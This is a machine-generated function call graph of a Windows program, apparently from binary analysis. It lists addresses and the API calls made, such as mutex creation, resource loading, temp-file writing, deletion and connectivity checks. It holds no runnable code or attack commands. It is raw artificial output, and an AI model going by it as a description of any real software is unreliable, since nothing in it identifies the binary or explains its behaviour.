139984->139983 139985 ab5ed4 GetWindowLongW 139984->139985 139985->139983 139986 ab5ee1 SetWindowLongW 139985->139986 139986->139983 139993 ab4c25 139988->139993 139991->139983 139992->139984 139994 ab4c37 139993->139994 140014 ab4c64 139993->140014 139995 ab4c6c 139994->139995 139996 ab4c47 139994->139996 139997 ab4c96 139995->139997 139998 ab4c74 139995->139998 140016 ab358f 139996->140016 139999 ab4c9b 139997->139999 140000 ab4cba 139997->140000 140025 ab460f 16 API calls 139998->140025 140026 ab41b0 10 API calls 139999->140026 140002 ab4ccc 140000->140002 140007 ab4cbf 140000->140007 140003 ab4cff 140002->140003 140008 ab4cd4 140002->140008 140005 ab4d08 140003->140005 140015 ab4c53 140003->140015 140029 ab4348 79 API calls 140005->140029 140027 ab4307 75 API calls 140007->140027 140028 ab43f9 17 API calls 140008->140028 140013 ab4d1b 140013->140015 140014->139979 140014->139980 140014->139983 140015->140014 140030 ab83f6 17 API calls 140015->140030 140017 ab359a 140016->140017 140018 ab35aa GetWindowLongW SetWindowLongW SetFocus 140017->140018 140031 ab30a3 140018->140031 140020 ab35d6 GetCurrentThreadId 140044 aa7ef3 EnterCriticalSection 140020->140044 140024 ab35fc 140024->140015 140025->140015 140026->140015 140027->140015 140028->140015 140029->140013 140030->140014 140032 ab30af __EH_prolog3 140031->140032 140033 ab30d3 SetWindowPos 140032->140033 140037 ab3140 std::_Locinfo::~_Locinfo 140032->140037 140055 a9e185 GetDC 140033->140055 140035 ab30f6 140036 af5546 std::locale::_Init 75 API calls 140035->140036 140038 ab3110 140036->140038 140037->140020 140039 aa7323 4 API calls 140038->140039 140040 ab3123 140038->140040 140039->140040 140056 ab2343 140040->140056 140083 aa7ddc 140044->140083 140047 a883c2 LeaveCriticalSection 140048 aa7f30 140047->140048 140049 aa749d 140048->140049 140050 aa74b0 140049->140050 140051 aa74e8 140049->140051 140053 aa74c7 140050->140053 140088 a7dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 140050->140088 140051->140024 140053->140051 140089 af4de7 73 API calls 4 library calls 140053->140089 140055->140035 140057 ab2393 140056->140057 140058 ab2357 GetClientRect 140056->140058 140060 a9e1a1 ReleaseDC DeleteDC 140057->140060 140061 ada52b 140058->140061 140060->140037 140062 ada539 140061->140062 140063 ada549 140062->140063 140064 ada578 140062->140064 140068 ada56b 140062->140068 140076 ada29f 140063->140076 140064->140068 140080 a9e185 GetDC 140064->140080 140067 ada58b CreateCompatibleDC 140069 ada5a1 SelectObject BitBlt SelectObject 140067->140069 140068->140057 140081 ab81aa DeleteDC 140069->140081 140072 ada5e8 140073 ada5f9 140072->140073 140074 ada5f0 DeleteDC 140072->140074 140082 a9e1a1 ReleaseDC DeleteDC 140073->140082 140074->140073 140077 ada2ac GdipDrawImageRectI 140076->140077 140079 ada2cb 140077->140079 140079->140068 140080->140067 140081->140072 140082->140068 140084 aa7de8 140083->140084 140086 aa7ded LeaveCriticalSection 140084->140086 140087 aa6441 RaiseException 140084->140087 140086->140047 140087->140086 140088->140053 140089->140051 140090 a8adc4 140101 af5421 140090->140101 140092 a8ade8 GetModuleFileNameW 140093 a7ba90 std::_String_base::_Xlen 2 API calls 140092->140093 140094 a8ae06 140093->140094 140095 a7bf10 78 API calls 140094->140095 140096 a8ae17 140095->140096 140102 a8995e 140096->140102 140098 a8ae24 ctype 140099 af4647 _strlwr_s_l_stat 5 API calls 140098->140099 140100 a8ae4d 140099->140100 140101->140092 140103 a8996a __EH_prolog3_catch 140102->140103 140122 a874b2 CLSIDFromProgID 140103->140122 140106 a899a1 std::_Locinfo::~_Locinfo 140106->140098 140108 a89ae4 140133 a875a2 CLSIDFromProgID 140108->140133 140111 a89b11 SysFreeString 140111->140106 140112 a87feb 4 API calls 140116 a89b3f 140112->140116 140114 a89a80 SysFreeString 140114->140106 140117 a87feb 4 API calls 140116->140117 140118 a89b76 140117->140118 140119 a89b99 140118->140119 140120 a89bac SysFreeString 140118->140120 140119->140111 140120->140106 140123 a874db CoCreateInstance 140122->140123 140124 a874ef 140122->140124 140123->140124 140125 af4647 _strlwr_s_l_stat 5 API calls 140124->140125 140126 a874fb 140125->140126 140126->140106 140127 a87feb 140126->140127 140128 a87ff9 SysFreeString 140127->140128 140129 a8801b 140127->140129 140128->140129 140130 a88004 SysAllocString 140128->140130 140129->140108 140129->140114 140130->140129 140131 a88011 140130->140131 140138 a7dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 140131->140138 140134 a875cb CoCreateInstance 140133->140134 140135 a875df 140133->140135 140134->140135 140136 af4647 _strlwr_s_l_stat 5 API calls 140135->140136 140137 a875eb 140136->140137 140137->140111 140137->140112 140138->140129 140139 ac2e41 140140 ac2e63 140139->140140 140151 ac316a 140140->140151 140142 ac2ea6 GetWindowLongW 140155 ac2e1e CallWindowProcW 140142->140155 140143 ac2e93 140154 ac2e1e CallWindowProcW 140143->140154 140146 ac2ec5 140147 ac2ed3 GetWindowLongW 140146->140147 140148 ac2ea1 140146->140148 140147->140148 140149 ac2ee0 SetWindowLongW 140147->140149 140149->140148 140156 ac30a1 140151->140156 140153 ac2e85 140153->140142 140153->140143 140153->140148 140154->140148 140155->140146 140157 ac30b3 140156->140157 140158 ac30ad 140156->140158 140157->140153 140158->140157 140160 ac2f2f 140158->140160 140161 ac2f3e __EH_prolog3_GS 140160->140161 140162 aa7451 BeginPaint 140161->140162 140163 ac2f53 GetClientRect 140162->140163 140164 aa7323 4 API calls 140163->140164 140165 ac2f7e 140164->140165 140166 ab6537 GetWindowRect 140165->140166 140167 ac2f92 140166->140167 140174 aa7395 DeleteObject BitBlt SelectObject DeleteDC ctype 140167->140174 140169 ac2fce 140175 aa747c EndPaint 140169->140175 140171 ac2fd6 140172 af550d 5 API calls 140171->140172 140173 ac2fdb 140172->140173 140173->140157 140174->140169 140175->140171 140176 afad5e 140179 afac98 140176->140179 140178 afad70 140182 afaca4 _realloc 140179->140182 140180 afacb7 140228 af98d1 67 API calls __getptd_noexit 140180->140228 140182->140180 140184 afaced 140182->140184 140183 afacbc 140229 afa5b1 6 API calls 2 library calls 140183->140229 140198 b118a1 140184->140198 140187 afacf2 140188 afacf9 140187->140188 140189 afad06 140187->140189 140230 af98d1 67 API calls __getptd_noexit 140188->140230 140191 afad2e 140189->140191 140192 afad0e 140189->140192 140216 b115ed 140191->140216 140231 af98d1 67 API calls __getptd_noexit 140192->140231 140195 afaccc _realloc @_EH4_CallFilterFunc@8 140195->140178 140196 afad39 140232 afad54 LeaveCriticalSection LeaveCriticalSection _vprintf_helper 140196->140232 140199 b118ad _realloc 140198->140199 140200 b0339f __lock 67 API calls 140199->140200 140211 b118bb 140200->140211 140201 b11930 140233 b119d0 140201->140233 140202 b11937 140204 b00596 __malloc_crt 67 API calls 140202->140204 140206 b11941 140204->140206 140205 b119c5 _realloc 140205->140187 140206->140201 140239 b0b7c4 InitializeCriticalSectionAndSpinCount _realloc 140206->140239 140210 b11966 140212 b11971 140210->140212 140213 b11984 EnterCriticalSection 140210->140213 140211->140201 140211->140202 140236 b032dc 67 API calls 7 library calls 140211->140236 140237 b0d2cc 68 API calls __lock 140211->140237 140238 b0d33a LeaveCriticalSection LeaveCriticalSection _doexit 140211->140238 140214 af49fc _realloc 67 API calls 140212->140214 140213->140201 140214->140201 140217 b11610 __wopenfile 140216->140217 140227 b1162a 140217->140227 140243 af9e6c 79 API calls 3 library calls 140217->140243 140219 b1162f 140242 afa5b1 6 API calls 2 library calls 140219->140242 140221 b1163f __wsopen_s 140221->140196 140223 b117f7 140223->140227 140244 af9e6c 79 API calls 3 library calls 140223->140244 140225 b11816 140225->140227 140245 af9e6c 79 API calls 3 library calls 140225->140245 140227->140221 140241 af98d1 67 API calls __getptd_noexit 140227->140241 140228->140183 140230->140195 140231->140195 140232->140195 140240 b032ad LeaveCriticalSection 140233->140240 140235 b119d7 140235->140205 140236->140211 140237->140211 140238->140211 140239->140210 140240->140235 140241->140219 140243->140223 140244->140225 140245->140227 140246 ae531f 140247 afea8c 86 API calls 140246->140247 140248 ae533f 140247->140248 140249 a94c5a 140250 a94c68 TlsGetValue 140249->140250 140251 a94c64 140249->140251 140250->140251 140254 a93dcb 140251->140254 140253 a94c83 140255 a93dd7 __EH_prolog3 140254->140255 140256 a91e07 RaiseException 140255->140256 140257 a93de1 140256->140257 140258 a8dd3e 2 API calls 140257->140258 140259 a93dfb 140258->140259 140260 a92a00 3 API calls 140259->140260 140261 a93e03 std::_Locinfo::~_Locinfo ctype 140260->140261 140261->140253 140262 aa8119 140263 aa812e 140262->140263 140264 aa817f 140263->140264 140265 aa8150 GetClientRect 140263->140265 140278 aa8136 140263->140278 140281 aa7cd1 140264->140281 140265->140264 140268 aa7cd1 6 API calls 140269 aa81aa 140268->140269 140285 aa687c 140269->140285 140273 aa81b6 140275 aa687c 6 API calls 140273->140275 140276 aa820e 140273->140276 140277 aa81df ShowWindow 140273->140277 140289 aa6850 140273->140289 140318 aa68c4 6 API calls ctype 140273->140318 140274 aa8256 140274->140278 140300 acf3ff 140274->140300 140275->140273 140276->140274 140295 aa65ca 140276->140295 140277->140273 140282 aa7ce5 140281->140282 140284 aa7cf4 140282->140284 140319 afa5d7 6 API calls _vprintf_helper 140282->140319 140284->140268 140286 aa688a 140285->140286 140288 aa6893 140286->140288 140320 afa5d7 6 API calls _vprintf_helper 140286->140320 140288->140273 140290 aa6859 140289->140290 140291 aa685e 140289->140291 140321 afa5d7 6 API calls _vprintf_helper 140290->140321 140293 aa6877 140291->140293 140322 afa5d7 6 API calls _vprintf_helper 140291->140322 140293->140273 140296 aa65de GetClientRect InvalidateRect 140295->140296 140297 aa6625 140295->140297 140298 aa6608 140296->140298 140297->140274 140323 ada470 140298->140323 140301 acf4dd 140300->140301 140302 acf419 IsWindow 140300->140302 140303 acf4ed GetDlgItem SetWindowTextW 140301->140303 140304 acf505 GetDlgItem 140301->140304 140302->140301 140305 acf42d GetClientRect 140302->140305 140306 acf537 140303->140306 140307 a7cf00 std::_String_base::_Xlen 69 API calls 140304->140307 140336 ac9cbe 140305->140336 140360 ac48a3 SendMessageW SendMessageW 140306->140360 140309 acf521 SetWindowTextW 140307->140309 140312 a8d354 2 API calls 140309->140312 140310 acf49c 140312->140306 140313 acf543 140313->140278 140318->140273 140319->140284 140320->140288 140321->140291 140322->140293 140324 ada47e 140323->140324 140329 ada48e 140324->140329 140333 a9e185 GetDC 140324->140333 140326 ada4c3 CreateCompatibleDC SelectObject BitBlt SelectObject 140334 ab81aa DeleteDC 140326->140334 140328 ada50d 140330 ada51e 140328->140330 140331 ada515 DeleteDC 140328->140331 140329->140297 140335 a9e1a1 ReleaseDC DeleteDC 140330->140335 140331->140330 140333->140326 140334->140328 140335->140329 140337 ac9ccf 140336->140337 140361 a9ee0d 140337->140361 140360->140313 140373 a9e84d 140361->140373 140364 ac56bd 140365 a877af 18 API calls 140364->140365 140366 ac56cf 140365->140366 140367 ac56df 140366->140367 140368 ac56d3 SetLastError 140366->140368 140369 ac56db 140367->140369 140370 a89677 4 API calls 140367->140370 140368->140369 140369->140310 140371 ac56f5 CreateWindowExW 140370->140371 140371->140369 140374 a9e8dd 140373->140374 140375 a9e85f 140373->140375 140374->140364 140375->140374 140376 a9e87c EnterCriticalSection 140375->140376 140377 a9e897 140376->140377 140391 a9e971 140376->140391 140378 a9e89e GetClassInfoExW 140377->140378 140379 a9e905 LoadCursorW 140377->140379 140381 a9e8c3 GetClassInfoExW 140378->140381 140382 a9e8e4 140378->140382 140379->140382 140380 a883c2 LeaveCriticalSection 140380->140374 140381->140382 140383 a9e8d5 140381->140383 140386 a9e943 GetClassInfoExW 140382->140386 140392 a9d630 67 API calls swprintf 140382->140392 140385 a883c2 LeaveCriticalSection 140383->140385 140385->140374 140387 a9e968 140386->140387 140386->140391 140390 a9e93d 140390->140386 140391->140380 140392->140390 140573 ad895e InternetGetConnectedState 140574 ad8972 140573->140574 140575 ad8978 140574->140575 140578 ad88eb 69 API calls 2 library calls 140574->140578 140577 ad8982 140578->140577 140579 aa869e 140583 aa86c2 _memset __EH_prolog3 140579->140583 140580 aa8753 IsDialogMessageW 140589 aa8738 ctype 140580->140589 140581 af4647 _strlwr_s_l_stat 5 API calls 140582 aa8778 140581->140582 140583->140580 140584 aa86fd GetClassNameW 140583->140584 140583->140589 140585 a7b680 78 API calls 140584->140585 140586 aa871d 140585->140586 140587 aa8734 ctype 140586->140587 140588 a87fa1 81 API calls 140586->140588 140587->140580 140587->140589 140588->140587 140589->140581 140590 adbd58 CreateMutexW 140591 adbd75 GetLastError 140590->140591 140592 adbdc1 140590->140592 140593 adbda2 EnterCriticalSection 140591->140593 140594 adbd82 CloseHandle FindWindowW 140591->140594 140597 adbc34 76 API calls 140593->140597 140594->140592 140596 adbdb9 LeaveCriticalSection 140596->140592 140597->140596 140598 a8bcde 140599 a8bf2b 140598->140599 140603 a8bce6 140598->140603 140600 ab73d5 154 API calls 140599->140600 140601 a8bf33 140600->140601 140602 a8b9b4 86 API calls 140601->140602 140605 a8bf3c 140602->140605 140603->140599 140604 a8bcfa 140603->140604 140672 a8bff4 140604->140672 140851 ac03a0 119 API calls 4 library calls 140605->140851 140607 a8bd04 140609 a8bd08 140607->140609 140610 a8bd16 140607->140610 140612 ab73d5 154 API calls 140609->140612 140682 ad85f5 140610->140682 140615 a8bca0 ctype 140612->140615 140621 af4647 _strlwr_s_l_stat 5 API calls 140615->140621 140624 a8bf7e 140621->140624 140673 a8c000 __EH_prolog3 140672->140673 140852 ae02e1 140673->140852 140678 a8c029 std::_Locinfo::~_Locinfo 140678->140607 140679 a8c047 140880 ae09ae 105 API calls 5 library calls 140679->140880 140681 a8c050 140681->140678 140683 ad8601 __EH_prolog3 140682->140683 140684 a7ba90 std::_String_base::_Xlen 2 API calls 140683->140684 140685 ad861a 140684->140685 140686 a7ba90 std::_String_base::_Xlen 2 API calls 140685->140686 140687 ad8627 140686->140687 140688 a7ba90 std::_String_base::_Xlen 2 API calls 140687->140688 140689 ad8636 GetCommandLineW 140688->140689 140690 a7c8e0 std::_String_base::_Xlen 69 API calls 140689->140690 140691 ad8648 140690->140691 140984 ad84c5 140691->140984 140693 ad864f std::_Locinfo::~_Locinfo 140851->140615 140853 ae02ee 140852->140853 140881 ae0145 140853->140881 140856 ae0877 140857 ae089b __EH_prolog3 140856->140857 140858 a7ba90 std::_String_base::_Xlen 2 API calls 140857->140858 140859 ae08b5 140858->140859 140887 ada6f2 140859->140887 140862 ae08f9 DeleteFileW 140899 ae0319 DeleteFileW CreateFileW 140862->140899 140865 a7ba90 std::_String_base::_Xlen 2 API calls 140867 ae0920 _memset 140865->140867 140866 af4647 _strlwr_s_l_stat 5 API calls 140868 a8c043 140866->140868 140869 ae0934 GetTempPathW 140867->140869 140868->140678 140868->140679 140879 ae08c7 ctype 140879->140866 140880->140681 140882 af4550 _memset 140881->140882 140883 ae0157 FindResourceW 140882->140883 140884 ae016f SizeofResource LoadResource 140883->140884 140886 a8c022 140883->140886 140885 ae018a LockResource 140884->140885 140884->140886 140885->140886 140886->140678 140886->140856 140888 ada6ff _memset 140887->140888 140889 ada732 GetTempPathW 140888->140889 140890 ada759 _memset _wcscat 140889->140890 140893 ada79b PathFileExistsW 140890->140893 140895 ada7b4 140890->140895 140927 ab12a8 140890->140927 140893->140890 140894 ada7c5 140893->140894 140896 a7c8e0 std::_String_base::_Xlen 69 API calls 140894->140896 140897 af4647 _strlwr_s_l_stat 5 API calls 140895->140897 140896->140895 140898 ada7c3 140897->140898 140898->140862 140898->140879 140900 ae034f 140899->140900 140901 ae034b 140899->140901 140933 ae0001 140900->140933 140901->140865 140901->140879 140928 ab130e _memset _wcsncpy 140927->140928 140929 ab12d4 _memset 140927->140929 140930 af4647 _strlwr_s_l_stat 5 API calls 140928->140930 140929->140928 140932 ab12f1 CoCreateGuid 140929->140932 140931 ab1378 PathCombineW 140930->140931 140931->140890 140932->140928 140934 ae0013 _realloc 140933->140934 140937 ae00f9 140934->140937 140938 ae00cd _realloc 140934->140938 140939 ae009b WriteFile 140934->140939 140938->140937 140939->140934 140939->140937 140986 ad84d1 __EH_prolog3 140984->140986 140985 ad85e1 ctype std::_Locinfo::~_Locinfo 140985->140693 140986->140985 140987 a7b680 78 API calls 140986->140987 140989 ad8536 ctype 140986->140989 140988 ad8509 140987->140988 140989->140985 140990 a7b680 78 API calls 140989->140990 141298 a79990 GetCurrentProcessId 141323 a795f0 141298->141323 141301 a79acf 141305 af4647 _strlwr_s_l_stat 5 API calls 141301->141305 141302 a79a1f GetLastError 141303 a79a35 141302->141303 141304 a79a2c WaitForSingleObject 141302->141304 141327 a79740 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 141303->141327 141304->141303 141307 a79aef 141305->141307 141308 a79a41 141309 a79a45 141308->141309 141310 a79a4c 141308->141310 141311 a79ab0 ReleaseMutex 141309->141311 141328 a79fa0 GetProcessHeap HeapAlloc 141310->141328 141311->141301 141313 a79ac8 CloseHandle 141311->141313 141313->141301 141314 a79a51 141315 a79a62 141314->141315 141329 a79de0 TlsAlloc RaiseException _memset __CxxThrowException@8 141314->141329 141317 a79a84 141315->141317 141330 af4656 RaiseException 141315->141330 141331 a79830 GetProcessHeap HeapAlloc 141317->141331 141320 a79a8f 141321 a79aab 141320->141321 141332 af4656 RaiseException 141320->141332 141321->141311 141324 a795f6 141323->141324 141326 a7961f CreateMutexW 141324->141326 141333 af7908 77 API calls __vsnwprintf_l 141324->141333 141326->141301 141326->141302 141327->141308 141328->141314 141329->141315 141330->141317 141331->141320 141332->141321 141333->141326 141334 ab68d3 141335 ab68dc 141334->141335 141339 ab68fc ctype 141334->141339 141335->141339 141340 ab6817 InternetGetConnectedState 141335->141340 141337 ab68eb 141338 ab683d 8 API calls 141337->141338 141337->141339 141338->141339 141341 ab682b 141340->141341 141342 ab6831 141341->141342 141345 ab67a4 69 API calls 2 library calls 141341->141345 141342->141337 141344 ab683b 141344->141337 141345->141344 141346 a9ddd1 141348 a9dde3 _memset 141346->141348 141347 a9ddfb 141349 af4647 _strlwr_s_l_stat 5 API calls 141347->141349 141348->141347 141351 af573e __wsplitpath_helper 67 API calls 141348->141351 141350 a9de83 141349->141350 141352 a9de34 _wcslen 141351->141352 141353 a9de4d SHFileOperationW 141352->141353 141353->141347 141354 aa67d0 PostMessageW 141355 a9ead4 141356 a9eaf9 141355->141356 141362 ac74a9 141356->141362 141365 aa9590 141356->141365 141357 a9eb5e SetWindowLongW 141358 a9eb50 141357->141358 141359 a9eb18 141359->141357 141359->141358 141368 ac72a9 141362->141368 141364 ac74cd 141364->141359 141666 aa9245 141365->141666 141367 aa95b4 141367->141359 141369 ac72bb 141368->141369 141408 ac72e1 141368->141408 141370 ac72d0 141369->141370 141371 ac7411 141369->141371 141374 ac72e9 141370->141374 141375 ac72da 141370->141375 141372 ac7439 141371->141372 141373 ac7419 141371->141373 141378 ac745b 141372->141378 141379 ac7442 141372->141379 141450 ac6f7f CreateSolidBrush 141373->141450 141376 ac72fc 141374->141376 141377 ac72f3 141374->141377 141468 ac6c41 118 API calls 4 library calls 141375->141468 141382 ac730f 141376->141382 141383 ac7306 141376->141383 141469 ac6d32 121 API calls 4 library calls 141377->141469 141385 ac7464 141378->141385 141399 ac7478 141378->141399 141477 ac5e20 80 API calls 5 library calls 141379->141477 141388 ac7319 141382->141388 141389 ac7322 141382->141389 141470 ac6dd6 127 API calls 4 library calls 141383->141470 141478 ac5cff 81 API calls 4 library calls 141385->141478 141471 ac71b5 218 API calls 141388->141471 141395 ac732c 141389->141395 141396 ac7335 141389->141396 141391 ac737a 141391->141408 141474 ac5b3b 26 API calls 141391->141474 141392 ac730d 141392->141408 141472 ac6ae2 121 API calls 5 library calls 141395->141472 141397 ac733f 141396->141397 141398 ac7348 141396->141398 141473 ac5aae 97 API calls 4 library calls 141397->141473 141402 ac7358 141398->141402 141406 ac73df 141398->141406 141399->141391 141479 ac510b GetDlgCtrlID SetBkColor 141399->141479 141411 ac639a 141402->141411 141404 ac73a0 141404->141408 141475 ac55b0 16 API calls __EH_prolog3_GS 141404->141475 141406->141391 141409 ac7404 141406->141409 141408->141364 141476 ac5bf0 89 API calls 4 library calls 141409->141476 141412 ac63be __EH_prolog3 141411->141412 141413 ac63d0 GetDlgItem 141412->141413 141437 ac6579 ctype 141412->141437 141415 ac63e9 _memset 141413->141415 141413->141437 141414 af4647 _strlwr_s_l_stat 5 API calls 141416 ac659c 141414->141416 141417 ac63fe GetWindowTextW 141415->141417 141416->141391 141418 a7ba90 std::_String_base::_Xlen 2 API calls 141417->141418 141419 ac6421 IsWindowVisible 141418->141419 141420 ac643e SendMessageW 141419->141420 141421 ac645a 141419->141421 141420->141421 141422 ac6453 141420->141422 141480 ac62ca 141421->141480 141422->141421 141437->141414 141543 ac65a6 141450->141543 141468->141408 141469->141408 141470->141392 141471->141408 141472->141392 141473->141408 141474->141404 141475->141408 141476->141408 141477->141408 141478->141408 141479->141391 141481 ac62d6 __EH_prolog3 141480->141481 141482 a7b680 78 API calls 141481->141482 141483 ac62e3 141482->141483 141484 a969e3 69 API calls 141483->141484 141485 ac62f5 141484->141485 141486 a96986 69 API calls 141485->141486 141544 ac65b2 __EH_prolog3 141543->141544 141545 ac65c7 GetDlgItem 141544->141545 141546 abf7d0 19 API calls 141545->141546 141547 ac65e3 141546->141547 141548 ac5f33 78 API calls 141547->141548 141549 ac65f1 141548->141549 141550 ac3197 70 API calls 141549->141550 141551 ac6600 ctype 141550->141551 141552 ac6652 GetDlgItem 141551->141552 141553 aa6c96 19 API calls 141552->141553 141554 ac6668 141553->141554 141555 ac134f 14 API calls 141554->141555 141556 ac667f 141555->141556 141557 ac66ac GetDlgItem 141556->141557 141558 abf7d0 19 API calls 141557->141558 141559 ac66c2 141558->141559 141560 ac66df GetDlgItem 141559->141560 141561 abf7d0 19 API calls 141560->141561 141562 ac66f5 141561->141562 141667 aa9258 141666->141667 141692 aa92bb 141666->141692 141668 aa928d 141667->141668 141669 aa92c2 141667->141669 141716 aa8f5a GetWindowLongW GetWindowLongW 141668->141716 141670 aa92ca 141669->141670 141671 aa92e9 141669->141671 141772 aa7656 9 API calls _strlwr_s_l_stat 141670->141772 141672 aa9361 141671->141672 141673 aa92f1 141671->141673 141675 aa936a 141672->141675 141676 aa9383 141672->141676 141681 aa9328 141673->141681 141682 aa931f 141673->141682 141673->141692 141775 aa6727 224 API calls 141675->141775 141678 aa938c 141676->141678 141679 aa93a7 141676->141679 141677 aa92aa 141677->141692 141783 aa7dff 24 API calls 141677->141783 141755 aa91eb 141678->141755 141684 aa93cd 141679->141684 141685 aa93e1 141679->141685 141679->141692 141681->141677 141688 aa9332 141681->141688 141773 aa59be 154 API calls 141682->141773 141766 aa6659 IsWindowVisible 141684->141766 141685->141692 141693 aa941b 141685->141693 141694 aa9407 141685->141694 141774 aa8edf 90 API calls 141688->141774 141690 aa937e 141690->141677 141692->141367 141698 aa9424 141693->141698 141704 aa943b 141693->141704 141776 aa8f3b 159 API calls 141694->141776 141695 aa9339 141695->141692 141777 aa5c31 8 API calls 141698->141777 141699 aa944d 141701 aa945a 141699->141701 141702 aa9480 141699->141702 141779 aa6560 IsWindow IsWindow IsWindowVisible PostMessageW PostMessageW 141701->141779 141703 aa947b 141702->141703 141708 aa94ae 141702->141708 141703->141702 141780 aa5a41 IsWindow IsWindow IsWindowVisible PostMessageW 141703->141780 141704->141699 141778 aa800a 74 API calls 141704->141778 141709 aa94d4 141708->141709 141781 aa82da 7 API calls 141708->141781 141714 aa94f1 141709->141714 141769 aa662b 141709->141769 141710 aa94a9 141710->141708 141713 aa954a 141782 aa8061 104 API calls __EH_prolog3_GS 141713->141782 141714->141677 141714->141713 141784 aa7927 141716->141784 141719 a7ba90 std::_String_base::_Xlen 2 API calls 141720 aa8fdc 141719->141720 141721 a7bf10 78 API calls 141720->141721 141722 aa8ff1 SetWindowTextW 141721->141722 141723 aa6180 13 API calls 141722->141723 141724 aa9005 9 API calls 141723->141724 141725 aa7ef3 4 API calls 141724->141725 141726 aa9078 141725->141726 141727 aa749d 75 API calls 141726->141727 141728 aa908e 141727->141728 141814 aa7530 141728->141814 141756 aa91f8 141755->141756 141757 aa9226 141755->141757 141758 aa9224 141756->141758 141759 aa9202 GetTickCount 141756->141759 141757->141758 141957 aa8e84 156 API calls 141757->141957 141758->141692 141760 a8b9b4 86 API calls 141759->141760 141762 aa9216 141760->141762 141903 ae5385 141762->141903 141767 aa6678 141766->141767 141768 aa6669 Shell_NotifyIconW 141766->141768 141767->141692 141768->141767 141770 aa6639 KillTimer PostMessageW 141769->141770 141771 aa6655 141769->141771 141770->141771 141771->141714 141772->141677 141773->141692 141774->141695 141775->141690 141776->141692 141777->141695 141778->141699 141779->141703 141780->141710 141781->141709 141782->141692 141783->141692 141785 aa7938 GetWindowLongW 141784->141785 141787 aa795a 141785->141787 141788 aa7966 141785->141788 141876 a9d5cf GetWindowLongW SetWindowLongW SetWindowPos 141787->141876 141789 aa799d GetDlgItem IsWindow 141788->141789 141791 aa62fa 3 API calls 141788->141791 141792 aa79b8 141789->141792 141793 aa79d2 141789->141793 141794 aa797e SendMessageW 141791->141794 141792->141793 141797 aa79ca 141792->141797 141872 aa5ea9 141793->141872 141794->141789 141796 aa798e SendMessageW 141794->141796 141796->141789 141877 aa6019 DestroyWindow 141797->141877 141800 aa7aca 141804 aa7aee GetWindowRect 141800->141804 141805 aa7add GetClientRect 141800->141805 141810 aa7aff 141800->141810 141801 aa7a18 GetDlgItem IsWindow 141801->141800 141802 aa7a36 141801->141802 141878 aa5fc7 CreateWindowExW 141802->141878 141804->141810 141805->141810 141806 aa7a63 IsWindow 141806->141800 141808 aa7a6c GetWindowRect MapWindowPoints 141806->141808 141807 aa7b7a GetDlgItem GetWindowRect MapWindowPoints 141807->141810 141879 aa6fe3 75 API calls 2 library calls 141808->141879 141809 aa7bfe SetWindowLongW SetWindowLongW 141809->141719 141810->141807 141810->141809 141880 aa5ec6 RaiseException 141810->141880 141881 aa6fe3 75 API calls 2 library calls 141810->141881 141873 aa5eb8 GetClientRect 141872->141873 141874 aa5eb2 141872->141874 141873->141800 141873->141801 141875 af49fc _realloc 67 API calls 141874->141875 141875->141873 141876->141788 141877->141793 141878->141806 141879->141800 141880->141810 141881->141810 141904 ae5391 __EH_prolog3 141903->141904 141905 a7ba90 std::_String_base::_Xlen 2 API calls 141904->141905 141906 ae53a0 141905->141906 141907 a8cc03 69 API calls 141906->141907 141908 ae53bb 141907->141908 141958 ae5348 141908->141958 141957->141758 141959 ae5354 __EH_prolog3 141958->141959 141962 a9cf85 141959->141962 141961 ae5371 std::_Locinfo::~_Locinfo 141963 a9cf96 141962->141963 141964 a9cfa2 141963->141964 141965 a9cfb4 141963->141965 141971 a9b4f4 69 API calls 141964->141971 141972 a9aab5 6 API calls ctype 141965->141972 141968 a9cfbe 141973 a9c560 76 API calls 141968->141973 141969 a9cfaf 141969->141961 141971->141969 141972->141968 141973->141969 142162 6c5d6ee0 GetCurrentProcessId 142185 6c5d6c60 142162->142185 142165 6c5d6f6e GetLastError 142167 6c5d6f7b WaitForSingleObject 142165->142167 142168 6c5d6f84 142165->142168 142166 6c5d703a 142167->142168 142189 6c5d6cd0 GetProcessHeap HeapLock HeapWalk HeapWalk HeapUnlock 142168->142189 142170 6c5d6f8c 142171 6c5d6f9a GetProcessHeap 142170->142171 142172 6c5d6f90 142170->142172 142174 6c5d6fb5 142171->142174 142175 6c5d6fa6 HeapAlloc 142171->142175 142173 6c5d701b ReleaseMutex 142172->142173 142173->142166 142176 6c5d7033 CloseHandle 142173->142176 142177 6c5d6fc7 142174->142177 142190 6c5d7360 _memset TlsAlloc __CxxThrowException 142174->142190 142175->142174 142176->142166 142179 6c5d6fec 142177->142179 142180 6c5d6fd7 __CxxThrowException 142177->142180 142191 6c5d6da0 GetProcessHeap HeapAlloc 142179->142191 142180->142179 142182 6c5d6ffa 142183 6c5d7016 142182->142183 142184 6c5d7001 __CxxThrowException 142182->142184 142183->142173 142184->142183 142186 6c5d6c66 142185->142186 142187 6c5d6c77 _vswprintf_s 142186->142187 142188 6c5d6c96 CreateMutexW 142186->142188 142187->142188 142188->142165 142188->142166 142189->142170 142190->142177 142191->142182 142192 6c655bd8 142193 6c655be1 142192->142193 142195 6c655bee 142193->142195 142196 6c655b5c 142193->142196 142206 6c6923d1 142196->142206 142200 6c655b83 142201 6c68d47e _malloc 53 API calls 142200->142201 142202 6c655b92 142201->142202 142203 6c655b9a _memset 142202->142203 142205 6c655bb0 142202->142205 142210 6c6922ee 73 API calls __fread_nolock 142203->142210 142205->142195 142211 6c69230b 142206->142211 142208 6c655b71 142208->142205 142209 6c692fa4 56 API calls 5 library calls 142208->142209 142209->142200 142210->142205 142213 6c692317 142211->142213 142212 6c69232a 142260 6c69464e 52 API calls __getptd_noexit 142212->142260 142213->142212 142215 6c692360 142213->142215 142230 6c6a0168 142215->142230 142216 6c69232f 142261 6c68e312 6 API calls 2 library calls 142216->142261 142219 6c692365 142220 6c692379 142219->142220 142221 6c69236c 142219->142221 142223 6c6923a1 142220->142223 142224 6c692381 142220->142224 142262 6c69464e 52 API calls __getptd_noexit 142221->142262 142245 6c69feb4 142223->142245 142263 6c69464e 52 API calls __getptd_noexit 142224->142263 142228 6c69233f @_EH4_CallFilterFunc@8 142228->142208 142231 6c6a0174 142230->142231 142265 6c697692 142231->142265 142233 6c6a01fe __malloc_crt 142234 6c6a021d 142233->142234 142243 6c6a01f7 142233->142243 142299 6c69ca1e InitializeCriticalSectionAndSpinCount 142234->142299 142236 6c6a028c 142236->142219 142238 6c6a022d 142239 6c6a024b 